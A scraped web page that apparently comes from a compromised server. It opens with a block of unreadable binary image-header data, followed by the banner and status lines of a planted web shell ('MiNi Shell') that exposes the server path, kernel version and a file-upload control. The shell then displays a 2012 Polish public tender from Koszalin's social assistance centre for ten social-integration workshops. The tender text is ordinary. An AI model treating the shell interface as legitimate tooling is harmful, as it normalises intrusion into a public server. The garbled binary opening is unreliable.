JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120906/192369-N-2012.html

<p class="kh_header"><b>Koszalin: Realizacja instrumentów aktywnej integracji dla uczestników projektu Koszaliński Program Integracji Społecznej - START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 192369 - 2012; data zamieszczenia: 06.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , Al. Monte Cassino 2, 75-412 Koszalin, woj. zachodniopomorskie, tel. 094 3160300, faks 0-94 3160328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mops.koszalin.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja instrumentów aktywnej integracji dla uczestników projektu Koszaliński Program Integracji Społecznej - START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja instrumentów aktywnej integracji dla uczestników projektu Koszaliński Program Integracji Społecznej - START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w podziale na następujące zadania:

Zadanie 1
 Czas na zmianę - warsztaty wizażu i stylizacji 
Zadanie 2
Cykl zajęć Spotkanie z ekonomią społeczną w teorii i w praktyce
Zadanie 3
Warsztaty informatyczne
Zadanie 4
Kurs pierwszej pomocy przedmedycznej
Zadanie 5
Warsztaty rękodzieła artystycznego
Zadanie 6
Warsztaty kulinarne Kuchnia za grosik
Zadanie 7
Warsztaty Racjonalne gospodarowanie budżetem domowym
Zadanie 8	
Moje mieszkanie na szóstkę. Warsztaty z zakresu dbałości o mieszkanie i otoczenie
Zadanie 9
Warsztaty motywacyjne i doskonalące umiejętności komunikacyjne
Zadanie 10
Usługa wsparcia i aktywizacji rodzin marginalizowanych - wsparcie konsultanta rodzinnego

Na uczestników projektu składają się 3 grupy osób : 
Grupa I - osoby niepełnosprawne - do 38 osób (w tym 3 osoby kontynuujące udział):
-osoby bezrobotne i lub nieaktywne zawodowo i lub zatrudnione, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej, posiadające orzeczenie o stopniu niepełnosprawności (lub równoważne); głównie osoby 
z zaburzeniami psychicznymi, osoby z zaburzeniami układu ruchu, osoby 
z zaburzeniami układu oddechowego i krążenia;
Grupa II - do 34 osób (w tym 2 osoby kontynuujące udział)
-osoby z problemami w sprawach opiekuńczo-wychowawczych, głównie rodziny niepełne lub wielodzietne, zagrożone pozbawieniem ograniczeniem praw rodzicielskich;
-osoby bezrobotne i lub nieaktywne zawodowo i lub zatrudnione, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej;
Grupa III - do 37 osób bezrobotnych nieaktywnych zawodowo (w tym 2 osoby kontynuujące udział) 
- os. bezrobotne i lub os. nieaktywne zawodowo i lub os. zatrudnione (w tym os. długotrwale bezrobotne, os. bezdomne, os. niepełnosprawne), które cechuje brak lub niski poziom motywacji, brak lub nieadekwatność kwalifikacji do potrzeb rynku pracy; os. korzystające ze świadczeń pomocy społecznej; os. w wieku aktywności zawodowej.
Liczba osób biorących udział w poszczególnym Zadaniu została wskazana w szczegółowym opisie przedmiotu zamówienia dla poszczególnych Zadań.

Szczegółowy opis przedmiotu zamówienia dla poszczególnych Zadań

   Zadanie 1
Czas na zmianę - warsztaty wizażu i stylizacji - 42 osoby (uczestnicy z grupy I - 12 osób; grupy II - 30 osób). Zajęcia prowadzone będą w trzech podgrupach liczących maks. do 15 osób:
- 54 godz., tj. 3 dni x 6 godz. dla każdej podgrupy z przerwą obiadową + serwis kawowy;
- w warsztatach udział weźmie fotograf, który wykona dla uczestników zdjęcia (przed warsztatami i po warsztatach). Zdjęcia te uczestnicy warsztatów wykorzystają w swoim CV.
 
Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego, w tym powrót na rynek pracy i aktywizację zawodową uczestników.

Tematyka:
- analiza kolorystyczna - indywidualny dobór kolorów, fryzury;
- zasady doboru garderoby. Nabycie umiejętności skutecznego tuszowania mankamentów urody i podkreślenia atutów. Dobór garderoby do miejsca pracy lub poszukiwanego zatrudnienia;
- zasady łączenia kolorów i dobierania dodatków do garderoby;
- psychologia koloru;
- dobór stroju, makijażu i fryzury na różne okazje, ze szczególnym uwzględnieniem pełnienia ról zawodowych i rodzicielskich;
- techniki makijażu. Dobór kosmetyków;
- analiza kształtu twarzy. Wykonanie makijażu. Dokumentacja fotograficzna.

Zadanie 2
Cykl zajęć Spotkanie z ekonomią społeczną w teorii i w praktyce - 72 osoby (uczestnicy z grupy I - 22 osoby, grupy II - 30 osób, grupy III - 20 osób) - III spotkania (w tym ostatnie spotkanie wyjazdowe).

Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego, w tym powrót na rynek pracy i aktywizację zawodową uczestników.

- Spotkanie I o charakterze informacyjnym, prowadzone w formie wykładu - 1 dzień x 8 godz. z przerwą obiadową + serwis kawowy. Liczba uczestników: 72 osoby.

Tematyka:
- czym jest ekonomia społeczna? Definicja, cele, obszary działań, rodzaje podmiotów;
- animacja społeczna. Działania na rzecz rozwoju społeczności lokalnej - dobre praktyki;
- zakładanie podmiotów ekonomii społecznej - po co?, na co?, dlaczego?;
- prawne i formalne aspekty działalności gospodarczej w ramach ekonomii społecznej.

- Spotkanie II o charakterze warsztatowym - 6 godz. x 3 podgrupy liczące maks. do 25 osób, tj. 18 godz. z przerwą obiadową + serwis kawowy. Pracę w podgrupach poprowadzą moderatorzy. Liczba uczestników: 72 osoby.

Tematyka:
- wypracowanie przykładowych podmiotów ekonomii społecznej dla miasta Koszalina, analiza zasobów.

- Spotkanie III o charakterze wyjazdowym - jednodniowa wizyta w 2 podmiotach ekonomii społecznej na terenie województwa zachodniopomorskiego (Centra Integracji Społecznej, spółdzielnie socjalne lub inne formy przedsiębiorczości społecznej) - czas trwania wyjazdu: maks. 10 godz. zegarowych z przejazdem. Dojazd autokarem, 1 gorący posiłek, napoje, poczęstunek, koszty wstępu, ewentualne występy artystyczne. Liczba uczestników: 72 osoby.

Tematyka:
- obserwacja różnych form aktywności uczestników w podmiotach ekonomii społecznej - min. 4 godz. tj. min. po 2 godz. zajęć w każdym podmiocie ekonomii społecznej. 

Zadanie 3
Warsztaty informatyczne - 14 osób (uczestnicy grupy II):
- 16 godz., tj. 4 dni x 4 godz. 

Cel: nabycie umiejętności korzystania z nowych technologii komunikacyjno-informacyjnych (obsługa komputera, urządzeń biurowych, korzystanie z Internetu).

Tematyka: 
- podstawy obsługi komputera (włączanie i wyłączanie komputera, posługiwanie się klawiaturą, myszką i drukarką) - 4 godz.;
- podstawy korzystania z Internetu - 4 godz.;
- praca z edytorem tekstu Microsoft Word - 4 godz.;
- obsługa urządzeń biurowych (faks, kserokopiarka) - 4 godz.
Zadanie 4
Kurs pierwszej pomocy przedmedycznej - 25 osób (uczestnicy grupy II). Zajęcia prowadzone będą w dwóch podgrupach liczących maks. do 13 osób:
- 8 godz., tj. 2 dni x 4 godz.

Cel: nabycie elementarnej wiedzy oraz umiejętności prawidłowego postępowania 
i zachowania się podczas sytuacji zagrażającej bezpieczeństwu i życiu, nauczenie się właściwej i sprawnej reakcji w stanach zagrożenia życia oraz umiejętności opanowania uczucia strachu podczas udzielania pierwszej pomocy.

Zadanie 5
Warsztaty rękodzieła artystycznego - 15 osób (uczestnicy grupy I):
- 50 godz., tj. 10 dni x 5 godz.

Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego uczestników i powinny pełnić funkcję terapii zajęciowej - usprawniać uczestników fizycznie i psychicznie.

Tematyka:
- zapoznanie uczestników z różnymi dziedzinami rękodzieła artystycznego: filc, decoupage, rzeźba, ceramika, biżuteria, florystyka, scrapbooking, haft i koronka;
- zajęcia praktyczne w podgrupach zajmujących się daną dziedziną rękodzieła;
- wykonanie ozdób bożonarodzeniowych i prezentów świątecznych dla najbliższych.

Zadanie 6
Warsztaty kulinarne Kuchnia za grosik - uczestnicy grupy II - 18 osób:
- 20 godz., tj. 4 dni x 5 godz. 

Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego uczestników. Zajęcia teoretyczne i praktyczne mają przygotować uczestników do świadomego podejścia do spraw związanych z żywieniem i nauczyć przyrządzania posiłków uwzględniając ograniczony budżet oraz zasady zdrowego żywienia, jako istotny element profilaktyki zdrowotnej.

Tematyka: 
- podstawowe zasady przygotowywania posiłków. Stanowisko pracy. Formy przetwarzania żywności;
- racjonalne żywienie. Składniki odżywcze i ich wpływ na zdrowie człowieka. Co warto jeść, czego należy unikać?;
- ekonomia w lodówce- jak kupować i nie marnować;
- zajęcia praktyczne połączone z degustacją. Nauka przygotowania następujących potraw:zupy, dania obiadowe, desery, śniadania/kolacje;
- przygotowanie uroczystości okolicznościowych (imprezy rodzinne, święta, urodziny, imieniny);
- dekorowanie stołów i potraw.
 
Zadanie 7
Warsztaty Racjonalne gospodarowanie budżetem domowym -  uczestnicy grupy I - 14 osób. Zajęcia wyjazdowe prowadzone będą w jednej podgrupie:
- 3 dni - 2 noclegi (piątek - niedziela), tj. 16 godz., (1 dzień - 4 godz., 2  dzień - 8 godz., 3 dzień - 4 godz.).

Cel: nabycie wiedzy z zakresu umiejętnego racjonalnego gospodarowania budżetem domowym, nabycie umiejętności opracowania budżetu domowego oraz nauka oszczędzania. 

Tematyka:
- Podstawy finansów domowych i cele finansowe (podstawowe zagadnienia ekonomiczne, definiowanie posiadanych zasobów, źródła dochodów i obszary wydatków);
- Jak stworzyć budżet? (stawianie celów, planowe i celowe zarządzanie budżetem, kontrola przepływów i zmienność w czasie);
- Oszczędzanie bez wyrzeczeń (definiowanie źródeł niekontrolowanych wypływów, klasyfikacja 
i funkcje wydatków, negocjacje w codziennych sprawach i zakupach);
- Planowanie i kontrolowanie wydatków (przykładowy budżet domowy, indywidualne budżety domowe, techniki zarządzania nimi, zakupy codziennie i okazyjne);
- Zasady zarządzania finansami w budżecie domowym (przykładowy budżet domowy, indywidualne budżety domowe, techniki zarządzania, omówienie przykładowych budżetów, sugerowane zmiany, asertywność w kontaktach, czego nie wiedzą ludzie mający problemy finansowe - czyli jak sobie radzić w sytuacjach kryzysowych?).

Zadanie 8
Moje mieszkanie na szóstkę. Warsztaty z zakresu dbałości o mieszkanie i otoczenie - uczestnicy grupy II - 12 osób:
- 20 godz., tj. 4 dni x 5 godz.

Cel: podniesienie kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego uczestników. Zajęcia teoretyczne 
i praktyczne mają przygotować uczestników do świadomego podejścia do spraw związanych 
z dbaniem o porządek oraz wypracowanie umiejętności racjonalnego sprzątania tak, aby czynność ta była przyjemnością a nie przykrym obowiązkiem.

Tematyka:
- problematyka utrzymania czystości;
- środki chemiczne, ich rodzaje i zastosowanie;
- nauka i doskonalenie prania i prasowania;
- nakrywanie stołu;
- mycie podłóg;
- sprzątanie sanitariatów;
- mycie powierzchni szklanych.

Zadanie 9
Wyjazdowe warsztaty motywacyjne i doskonalące umiejętności komunikacyjne - 9 osób (uczestnicy grupy I):
- 3 dni - 2 noclegi (piątek - niedziela), tj. 12 godz. (1 dzień - 3 godz., 2 dzień - 6 godz., 3 dzień - 3 godz.)

Cel:  integracja uczestników, zebranie informacji zwrotnych na temat własnego zachowania, wzmocnienie motywacji do działania, poznanie zachowań innych osób i funkcjonowania w grupie oraz nauka prawidłowej komunikacji.

Tematyka:
- zwiększenie umiejętności funkcjonowania w obszarze społeczno - zawodowym;
- techniki i sposoby zmniejszania społecznego lęku;
- techniki i sposoby rozwiązywania problemów interpersonalnych;
- kształtowanie odpowiedzialnej i aktywnej postawy życiowej.

Zadanie 10
Usługa wsparcia i aktywizacji rodzin marginalizowanych - wsparcie konsultanta rodzinnego - dla 6 osób (oraz ich rodzin) x 20 godz. miesięcznie  = 120 godz. miesięcznie przez okres 3 m-cy = 360 godz.;
- usługę świadczyć będzie 2 konsultantów w miejscu zamieszkania uczestników..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt  6.
Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zajęć w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.00.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje konieczności wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub czynności zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, o którym mowa w pkt 10 ppkt 1 SIWZ, oraz dołączy do oferty oświadczenie o wpisie do Rejestru Instytucji Szkoleniowych (w przypadku złożenia oferty na Zadania 1 - 9), o którym mowa w pkt 10 ppkt 5 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, o którym mowa w pkt 10 ppkt 1  SIWZ oraz dołączy do oferty wykaz wykonanych usług, na Załączniku Nr 7, o którym mowa w pkt 10 ppkt 2 SIWZ, z którego będzie wynikało, iż zrealizował z należytą starannością w okresie ostatnich trzech lat (lub krótszym): 
Dla Zadania 1 - usługę i w zakresie realizacji warsztatu ów i lub szkolenia eń i lub doradztwa w zakresie wizażu i lub stylizacji, w których łącznie wzięło udział co najmniej 29 osób;
Dla Zadania 2 - usługę i w zakresie prowadzenia zajęć grupowych z zakresu ekonomii społecznej, w których łącznie wzięło udział co najmniej 50 osób;
Dla Zadania 3 - usługę i prowadzenia warsztatu ów i lub szkolenia eń z zakresu obsługi komputera, w których łącznie wzięło udział co najmniej 9 osób;
Dla Zadania 4 - usługę i prowadzenia kursu ów i lub szkolenia eń z zakresu pierwszej pomocy przedmedycznej, w których łącznie wzięło udział co najmniej 17 osób;
Dla Zadania 5 - usługę i prowadzenia warsztatu ów i lub szkolenia eń z zakresu rękodzieła artystycznego lub rękodzieła, w których łącznie wzięło udział co najmniej 10 osób;
Dla Zadania 6 - usługę i prowadzenia warsztatu ów i lub szkolenia eń kulinarnych i lub gastronomicznych, w których łącznie wzięło udział co najmniej 12 osób;
Dla Zadania 7 - usługę i prowadzenia warsztatu ów i lub szkolenia eń w zakresie racjonalnego gospodarowania budżetem domowym i lub zarządzania budżetem domowym, w których łącznie wzięło udział co najmniej 9 osób;
Dla Zadania 8 - usługę i polegające na świadczeniu pracy i lub świadczeniu usług i lub wolontariacie w zakresie pracy z rodziną (np. asystent osoby niepełnosprawnej, asystent rodziny, pedagog świadczący usługi na zasadzie asystentury, asystent osoby bezdomnej itp.) przez min. 2 m-ce;
Dla Zadania 9  - usługę i prowadzenia warsztatu ów i lub szkolenia eń motywacyjnych i lub doskonalących umiejętności komunikacyjne, w których łącznie wzięło udział co najmniej 6 osób;
Dla Zadania 10 - usługę i polegające na świadczeniu pracy i lub świadczeniu usług i lub wolontariacie w zakresie pracy z rodziną (np. asystent osoby niepełnosprawnej, asystent rodziny, pedagog świadczący usługi na zasadzie asystentury, asystent osoby bezdomnej itp.) przez min. 3 m-ce;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym  zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, o którym mowa w pkt 10 ppkt 1  SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, o którym mowa w pkt 10 ppkt 1  SIWZ. oraz dołączy do oferty oświadczenie, o którym mowa w pkt 10 ppkt 4 SIWZ i wykaz osób, o którym mowa w pkt 10 ppkt 3 SIWZ, które będą uczestniczyć w wykonywaniu zamówienia, z którego będzie wynikało, że Wykonawca dysponuje:

-co najmniej 1 osobą posiadającą wykształcenie min. średnie i doświadczenie w prowadzeniu grupowych warsztatu ów lub szkolenia eń i lub doradztwa w zakresie wizażu i lub stylizacji, w których łącznie wzięło udział co najmniej 29 osób - dla Zadania 1;
- co najmniej 3 osobami posiadającymi wykształcenie wyższe oraz doświadczenie polegające na przeprowadzeniu grupowych zajęć z zakresu ekonomii społecznej, w których łącznie wzięło udział co najmniej 50 osób - dla Zadania 2;
- co najmniej 1 osobą posiadającą wykształcenie wyższe oraz doświadczenie polegające na przeprowadzeniu grupowego ych warsztatu ów i lub szkolenia eń z zakresu obsługi komputera, w których łącznie wzięło udział co najmniej 9 osób - dla Zadania 3;
- co najmniej 1 osobą posiadającą kwalifikacje ratownika medycznego oraz doświadczenie w zakresie prowadzenia kursu ów i lub szkolenia eń pierwszej pomocy przedmedycznej, w których łącznie wzięło udział co najmniej 17 osób - dla Zadania 4;
- co najmniej 1 osobą posiadającą wykształcenie min. średnie w kierunku plastycznym lub wzornictwa oraz doświadczenie w zakresie prowadzenia warsztatu ów i lub szkolenia eń rękodzieła artystycznego lub rękodzieła, w których łącznie wzięło udział co najmniej 10 osób - dla Zadania 5;
- co najmniej 1 osobą posiadającą wykształcenie min. średnie oraz doświadczenie w zakresie prowadzenia warsztatu ów i lub szkolenia eń kulinarnych i lub gastronomicznych, w których łącznie wzięły udział co najmniej 12 osób - dla Zadania 6;
- co najmniej 1 osobą posiadającą wykształcenie min. wyższe oraz doświadczenie w zakresie prowadzenia warsztatu ów i lub szkolenia eń w zakresie racjonalnego gospodarowania budżetem domowym i lub zarządzania budżetem domowym, w których łącznie wzięło udział co najmniej 9 osób - dla Zadania 7;
- co najmniej 1 osobą posiadającą min. 2 m-ce doświadczenia w pracy (zatrudnienie na podstawie stosunku pracy, umowy cywilnoprawnej wolontariat) z rodziną (np. asystent osoby niepełnosprawnej, asystent rodziny, pedagog świadczący usługi na zasadzie asystentury, asystent osoby bezdomnej itp.) - dla Zadania 8
- co najmniej 1 osobą posiadająca wykształcenie min. wyższe oraz doświadczenie w zakresie prowadzenia warsztatu ów i lub szkolenia eń motywacyjnych i lub doskonalących umiejętności komunikacyjne, w których łącznie wzięło udział co najmniej 6 osób - dla Zadania 9;
- co najmniej 2 osobami posiadającymi min. 3 m-ce doświadczenia w pracy (zatrudnienie na podstawie stosunku pracy, umowy cywilnoprawnej/wolontariat) z rodziną (np. asystent osoby niepełnosprawnej, asystent rodziny, pedagog świadczący usługi na zasadzie asystentury, asystent osoby bezdomnej itp.) - dla Zadania 10.
Wymagane jest oświadczenie, że osoby, które będą uczestniczyć 
w wykonywaniu zamówienia posiadają wymagane uprawnienia do realizacji przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek sytuacji ekonomicznej i finansowej zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunku, o którym mowa w pkt 10 ppkt 1  SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
